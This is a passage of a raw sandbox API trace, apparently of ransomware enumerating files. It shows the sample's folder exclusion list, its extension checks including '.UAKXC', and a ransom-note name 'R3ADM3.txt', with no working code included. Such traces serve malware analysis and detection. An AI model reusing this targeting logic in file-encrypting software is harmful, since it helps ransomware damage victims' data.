lpSrch="R3ADM3.txt") returned 0x0 [0160.475] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0x7792ed0 [0160.475] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeebe10 [0160.475] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeebd40 [0160.475] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x8e) returned 0xf350d8 [0160.475] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeebd40 | out: hHeap=0xea0000) returned 1 [0160.475] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeebe10 | out: hHeap=0xea0000) returned 1 [0160.475] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0x7792ed0 | out: hHeap=0xea0000) returned 1 [0160.475] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0x7794778 [0160.475] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0x7792ed0 [0160.475] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0x77948e0 [0160.475] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0x7794778 | out: hHeap=0xea0000) returned 1 [0160.475] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf350d8 | out: hHeap=0xea0000) returned 1 [0160.475] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7ffe6ce0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7ffe6ce0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x7ffe6ce0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Esl", cAlternateFileName="")) returned 1 [0160.475] lstrcmpW (lpString1="Esl", lpString2=".") returned 1 [0160.476] lstrcmpW (lpString1="Esl", lpString2="..") returned 1 [0160.476] StrStrIW (lpFirst="Esl", lpSrch="tmp") returned 0x0 [0160.476] StrStrIW (lpFirst="Esl", lpSrch="winnt") returned 0x0 [0160.476] StrStrIW (lpFirst="Esl", lpSrch="temp") returned 0x0 [0160.476] StrStrIW (lpFirst="Esl", lpSrch="thumb") returned 0x0 [0160.476] StrStrIW (lpFirst="Esl", lpSrch="$Recycle.Bin") returned 0x0 [0160.476] StrStrIW (lpFirst="Esl", lpSrch="$RECYCLE.BIN") returned 0x0 [0160.476] StrStrIW (lpFirst="Esl", lpSrch="System Volume Information") returned 0x0 [0160.476] StrStrIW (lpFirst="Esl", lpSrch="Boot") returned 0x0 [0160.476] StrStrIW (lpFirst="Esl", lpSrch="Windows") returned 0x0 [0160.476] StrStrIW (lpFirst="Esl", lpSrch="Trend Micro") returned 0x0 [0160.476] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeebe10 [0160.476] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeebd40 [0160.476] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeebe10 | out: hHeap=0xea0000) returned 1 [0160.476] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0x7792ef8 [0160.476] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeebe10 [0160.476] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeebd40 | out: hHeap=0xea0000) returned 1 [0160.476] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9d67db00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x81ed8ae0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9d67db00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x4288, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="IrakHau.htm", cAlternateFileName="")) returned 1 [0160.476] lstrcmpW (lpString1="IrakHau.htm", lpString2=".") returned 1 [0160.476] lstrcmpW (lpString1="IrakHau.htm", lpString2="..") returned 1 [0160.476] StrStrIW (lpFirst="IrakHau.htm", lpSrch=".UAKXC") returned 0x0 [0160.476] StrStrIW (lpFirst="IrakHau.htm", lpSrch=".exe") returned 0x0 [0160.476] StrStrIW (lpFirst="IrakHau.htm", lpSrch=".dll") returned 0x0 [0160.476] StrStrIW (lpFirst="IrakHau.htm", lpSrch=".lnk") returned 0x0 [0160.476] StrStrIW (lpFirst="IrakHau.htm", lpSrch=".sys") returned 0x0 [0160.477] StrStrIW (lpFirst="IrakHau.htm", lpSrch=".msi") returned 0x0 [0160.477] StrStrIW (lpFirst="IrakHau.htm", lpSrch="R3ADM3.txt") returned 0x0 [0160.477] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0x7792f20 [0160.477] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeebd40 [0160.477] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeebcd8 [0160.477] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x8e) returned 0xf350d8 [0160.477] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeebcd8 | out: hHeap=0xea0000) returned 1 [0160.477] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeebd40 | out: hHeap=0xea0000) returned 1 [0160.477] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0x7792f20 | out: hHeap=0xea0000) returned 1 [0160.477] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0x7794778 [0160.477] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0x7792f20 [0160.477] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0x7794958 [0160.477] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0x7794778 | out: hHeap=0xea0000) returned 1 [0160.477] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf350d8 | out: hHeap=0xea0000) returned 1 [0160.477] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9640cd00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7feb61e0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9640cd00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x423b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Leame.htm", cAlternateFileName="")) returned 1 [0160.477] lstrcmpW (lpString1="Leame.htm", lpString2=".") returned 1 [0160.477] lstrcmpW (lpString1="Leame.htm", lpString2="..") returned 1 [0160.477] StrStrIW (lpFirst="Leame.htm", lpSrch=".UAKXC") returned 0x0 [0160.477] StrStrIW (lpFirst="Leame.htm", lpSrch=".exe") returned 0x0 [0160.477] StrStrIW (lpFirst="Leame.htm", lpSrch=".dll") returned 0x0 [0160.477] StrStrIW (lpFirst="Leame.htm", lpSrch=".lnk") returned 0x0 [0160.477] StrStrIW (lpFirst="Leame.htm", lpSrch=".sys") returned 0x0 [0160.477] StrStrIW (lpFirst="Leame.htm", lpSrch=".msi") returned 0x0 [0160.477] StrStrIW (lpFirst="Leame.htm", lpSrch="R3ADM3.txt") returned 0x0 [0160.477] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0x7792f48 [0160.478] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeebd40 [0160.478] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeebcd8 [0160.478] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x8e) returned 0xf350d8 [0160.478] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeebcd8 | out: hHeap=0xea0000) returned 1 [0160.478] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeebd40 | out: hHeap=0xea0000) returned 1 [0160.478] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0x7792f48 | out: hHeap=0xea0000) returned 1 [0160.478] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0x7794778 [0160.478] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0x7792f48 [0160.478] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0x77949d0 [0160.478] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0x7794778 | out: hHeap=0xea0000) returned 1 [0160.478] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf350d8 | out: hHeap=0xea0000) returned 1 [0160.478] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9640cd00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7fe90080, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9640cd00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x41e3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="LeesMij.htm", cAlternateFileName="")) returned 1 [0160.478] lstrcmpW (lpString1="LeesMij.htm", lpString2=".") returned 1 [0160.478] lstrcmpW (lpString1="LeesMij.htm", lpString2="..") returned 1 [0160.478] StrStrIW (lpFirst="LeesMij.htm", lpSrch=".UAKXC") returned 0x0 [0160.478] StrStrIW (lpFirst="LeesMij.htm", lpSrch=".exe") returned 0x0 [0160.478] StrStrIW (lpFirst="LeesMij.htm", lpSrch=".dll") returned 0x0 [0160.478] StrStrIW (lpFirst="LeesMij.htm", lpSrch=".lnk") returned 0x0 [0160.478] StrStrIW (lpFirst="LeesMij.htm", lpSrch=".sys") returned 0x0 [0160.478] StrStrIW (lpFirst="LeesMij.htm", lpSrch=".msi") returned 0x0 [0160.478] StrStrIW (lpFirst="LeesMij.htm", lpSrch="R3ADM3.txt") returned 0x0 [0160.478] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0x7792f70 [0160.478] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeebd40 [0160.478] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeebcd8 [0160.479] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x8e) returned 0xf350d8 [0160.479] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeebcd8 | out: hHeap=0xea0000) returned 1 [0160.479] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeebd40 | out: hHeap=0xea0000) returned 1 [0160.479] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0x7792f70 | out: hHeap=0xea0000) returned 1 [0160.479] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0x7794778 [0160.479] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0x7792f70 [0160.479] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0x7794a48 [0160.479] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0x7794778 | out: hHeap=0xea0000) returned 1 [0160.479] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf350d8 | out: hHeap=0xea0000) returned 1 [0160.479] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9640cd00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7fe90080, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9640cd00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x4289, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Leggimi.htm", cAlternateFileName="")) returned 1 [0160.479] lstrcmpW (lpString1="Leggimi.htm", lpString2=".") returned 1 [0160.479] lstrcmpW (lpString1="Leggimi.htm", lpString2="..") returned 1 [0160.479] StrStrIW (lpFirst="Leggimi.htm", lpSrch=".UAKXC") returned 0x0 [0160.479] StrStrIW (lpFirst="Leggimi.htm", lpSrch=".exe") returned 0x0 [0160.479] StrStrIW (lpFirst="Leggimi.htm", lpSrch=".dll") returned 0x0 [0160.479] StrStrIW (lpFirst="Leggimi.htm", lpSrch=".lnk") returned 0x0 [0160.479] StrStrIW (lpFirst="Leggimi.htm", lpSrch=".sys") returned 0x0 [0160.479] StrStrIW (lpFirst="Leggimi.htm", lpSrch=".msi") returned 0x0 [0160.479] StrStrIW (lpFirst="Leggimi.htm", lpSrch="R3ADM3.txt") returned 0x0 [0160.479] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0x7792f98 [0160.479] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeebd40 [0160.479] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeebcd8 [0160.479] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x8e) returned 0xf350d8 [0160.479] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeebcd8 | out: hHeap=0xea0000) returned 1 [0160.479] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeebd40 | out: hHeap=0xea0000) returned 1 [0160.480] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0x7792f98 | out: hHeap=0xea0000) returned 1 [0160.480] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0x7794778 [0160.480] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0x7792f98 [0160.480] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0x7794ac0 [0160.480] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0x7794778 | out: hHeap=0xea0000) returned 1 [0160.480] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf350d8 | out: hHeap=0xea0000) returned 1 [0160.480] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98a32700, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7feb61e0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x98a32700, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x4273, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="LeiaMe.htm", cAlternateFileName="")) returned 1 [0160.480] lstrcmpW (lpString1="LeiaMe.htm", lpString2=".") returned 1 [0160.480] lstrcmpW (lpString1="LeiaMe.htm", lpString2="..") returned 1 [0160.480] StrStrIW (lpFirst="LeiaMe.htm", lpSrch=".UAKXC") returned 0x0 [0160.480] StrStrIW (lpFirst="LeiaMe.htm", lpSrch=".exe") returned 0x0 [0160.480] StrStrIW (lpFirst="LeiaMe.htm", lpSrch=".dll") returned 0x0 [0160.480] StrStrIW (lpFirst="LeiaMe.htm", lpSrch=".lnk") returned 0x0 [0160.480] StrStrIW (lpFirst="LeiaMe.htm", lpSrch=".sys") returned 0x0 [0160.480] StrStrIW (lpFirst="LeiaMe.htm", lpSrch=".msi") returned 0x0 [0160.480] StrStrIW (lpFirst="LeiaMe.htm", lpSrch="R3ADM3.txt") returned 0x0 [0160.480] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0x7792fc0 [0160.480] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeebd40 [0160.480] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeebcd8 [0160.480] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x8e) returned 0xf350d8 [0160.480] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeebcd8 | out: hHeap=0xea0000) returned 1 [0160.480] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeebd40 | out: hHeap=0xea0000) returned 1 [0160.480] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0x7792fc0 | out: hHeap=0xea0000) returned 1 [0160.480] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0x7794778 [0160.480] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0x7792fc0 [0160.481] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0x7794b38 [0160.481] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0x7794778 | out: hHeap=0xea0000) returned 1 [0160.481] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf350d8 | out: hHeap=0xea0000) returned 1 [0160.481] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x950fa000, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7fe90080, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x950fa000, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x42b6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Liesmich.htm", cAlternateFileName="")) returned 1 [0160.481] lstrcmpW (lpString1="Liesmich.htm", lpString2=".") returned 1 [0160.481] lstrcmpW (lpString1="Liesmich.htm", lpString2="..") returned 1 [0160.481] StrStrIW (lpFirst="Liesmich.htm", lpSrch=".UAKXC") returned 0x0 [0160.481] StrStrIW (lpFirst="Liesmich.htm", lpSrch=".exe") returned 0x0 [0160.481] StrStrIW (lpFirst="Liesmich.htm", lpSrch=".dll") returned 0x0 [0160.481] StrStrIW (lpFirst="Liesmich.htm", lpSrch=".lnk") returned 0x0 [0160.481] StrStrIW (lpFirst="Liesmich.htm", lpSrch=".sys") returned 0x0 [0160.481] StrStrIW (lpFirst="Liesmich.htm", lpSrch=".msi") returned 0x0 [0160.481] StrStrIW (lpFirst="Liesmich.htm", lpSrch="R3ADM3.txt") returned 0x0 [0160.481] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0x7792fe8 [0160.481] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeebd40 [0160.481] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeebcd8 [0160.481] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x8e) returned 0xf350d8 [0160.481] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeebcd8 | out: hHeap=0xea0000) returned 1 [0160.481] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeebd40 | out: hHeap=0xea0000) returned 1 [0160.481] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0x7792fe8 | out: hHeap=0xea0000) returned 1 [0160.481] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0x7794778 [0160.481] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0x7792fe8 [0160.481] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0x7794bb0 [0160.481] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0x7794778 | out: hHeap=0xea0000) returned 1 [0160.482] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf350d8 | out: hHeap=0xea0000) returned 1 [0160.482] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x950fa000, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7f82a560, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x950fa000, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x43c7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Lisezmoi.htm", cAlternateFileName="")) returned 1 [0160.482] lstrcmpW (lpString1="Lisezmoi.htm", lpString2=".") returned 1 [0160.482] lstrcmpW (lpString1="Lisezmoi.htm", lpString2="..") returned 1 [0160.482] StrStrIW (lpFirst="Lisezmoi.htm", lpSrch=".UAKXC") returned 0x0 [0160.482] StrStrIW (lpFirst="Lisezmoi.htm", lpSrch=".exe") returned 0x0 [0160.482] StrStrIW (lpFirst="Lisezmoi.htm", lpSrch=".dll") returned 0x0 [0160.482] StrStrIW (lpFirst="Lisezmoi.htm", lpSrch=".lnk") returned 0x0 [0160.482] StrStrIW (lpFirst="Lisezmoi.htm", lpSrch=".sys") returned 0x0 [0160.482] StrStrIW (lpFirst="Lisezmoi.htm", lpSrch=".msi") returned 0x0 [0160.482] StrStrIW (lpFirst="Lisezmoi.htm", lpSrch="R3ADM3.txt") returned 0x0 [0160.482] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0x7793010 [0160.482] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeebd40 [0160.482] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeebcd8 [0160.482] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x8e) returned 0xf350d8 [0160.482] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeebcd8 | out: hHeap=0xea0000) returned 1 [0160.482] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeebd40 | out: hHeap=0xea0000) returned 1 [0160.482] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0x7793010 | out: hHeap=0xea0000) returned 1 [0160.482] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0x7794778 [0160.482] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0x7793010 [0160.482] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0x7794c28 [0160.482] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0x7794778 | out: hHeap=0xea0000) returned 1 [0160.482] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf350d8 | out: hHeap=0xea0000) returned 1 [0160.482] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9c36ae00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x81ed8ae0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9c36ae00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x41fc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Llegiu-me.htm", cAlternateFileName="LLEGIU~1.HTM")) returned 1 [0160.483] lstrcmpW (lpString1="Llegiu-me.htm", lpString2=".") returned 1 [0160.483] lstrcmpW (lpString1="Llegiu-me.htm", lpString2="..") returned 1 [0160.483] StrStrIW (lpFirst="Llegiu-me.htm", lpSrch=".UAKXC") returned 0x0 [0160.483] StrStrIW (lpFirst="Llegiu-me.htm", lpSrch=".exe") returned 0x0 [0160.483] StrStrIW (lpFirst="Llegiu-me.htm", lpSrch=".dll") returned 0x0 [0160.483] StrStrIW (lpFirst="Llegiu-me.htm", lpSrch=".lnk") returned 0x0 [0160.483] StrStrIW (lpFirst="Llegiu-me.htm", lpSrch=".sys") returned 0x0 [0160.483] StrStrIW (lpFirst="Llegiu-me.htm", lpSrch=".msi") returned 0x0 [0160.483] StrStrIW (lpFirst="Llegiu-me.htm", lpSrch="R3ADM3.txt") returned 0x0 [0160.483] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0x7793038 [0160.483] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeebd40 [0160.483] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeebcd8 [0160.483] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x8e) returned 0xf350d8 [0160.483] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeebcd8 | out: hHeap=0xea0000) returned 1 [0160.483] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeebd40 | out: hHeap=0xea0000) returned 1 [0160.483] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0x7793038 | out: hHeap=0xea0000) returned 1 [0160.483] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0x7794778 [0160.483] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0x7793038 [0160.483] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0x7794ca0 [0160.483] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0x7794778 | out: hHeap=0xea0000) returned 1 [0160.483] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf350d8 | out: hHeap=0xea0000) returned 1 [0160.483] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9640cd00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7fe90080, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9640cd00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x434e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="LueMinut.htm", cAlternateFileName="")) returned 1 [0160.483] lstrcmpW (lpString1="LueMinut.htm", lpString2=".") returned 1 [0160.483] lstrcmpW (lpString1="LueMinut.htm", lpString2="..") returned 1 [0160.483] StrStrIW (lpFirst="LueMinut.htm", lpSrch=".UAKXC") returned 0x0 [0160.484] StrStrIW (lpFirst="LueMinut.htm", lpSrch=".exe") returned 0x0 [0160.484] StrStrIW (lpFirst="LueMinut.htm", lpSrch=".dll") returned 0x0 [0160.484] StrStrIW (lpFirst="LueMinut.htm", lpSrch=".lnk") returned 0x0 [0160.484] StrStrIW (lpFirst="LueMinut.htm", lpSrch=".sys") returned 0x0 [0160.484] StrStrIW (lpFirst="LueMinut.htm", lpSrch=".msi") returned 0x0 [0160.484] StrStrIW (lpFirst="LueMinut.htm", lpSrch="R3ADM3.txt") returned 0x0 [0160.484] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0x7793060 [0160.484] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeebd40 [0160.484] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeebcd8 [0160.484] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x8e) returned 0xf350d8 [0160.484] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeebcd8 | out: hHeap=0xea0000) returned 1 [0160.484] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeebd40 | out: hHeap=0xea0000) returned 1 [0160.484] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0x7793060 | out: hHeap=0xea0000) returned 1 [0160.484] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0x7794778 [0160.484] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0x7793060 [0160.484] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0x7794d18 [0160.484] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0x7794778 | out: hHeap=0xea0000) returned 1 [0160.484] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf350d8 | out: hHeap=0xea0000) returned 1 [0160.484] FindNextFileW (in: hFindFile=0xecfb60, 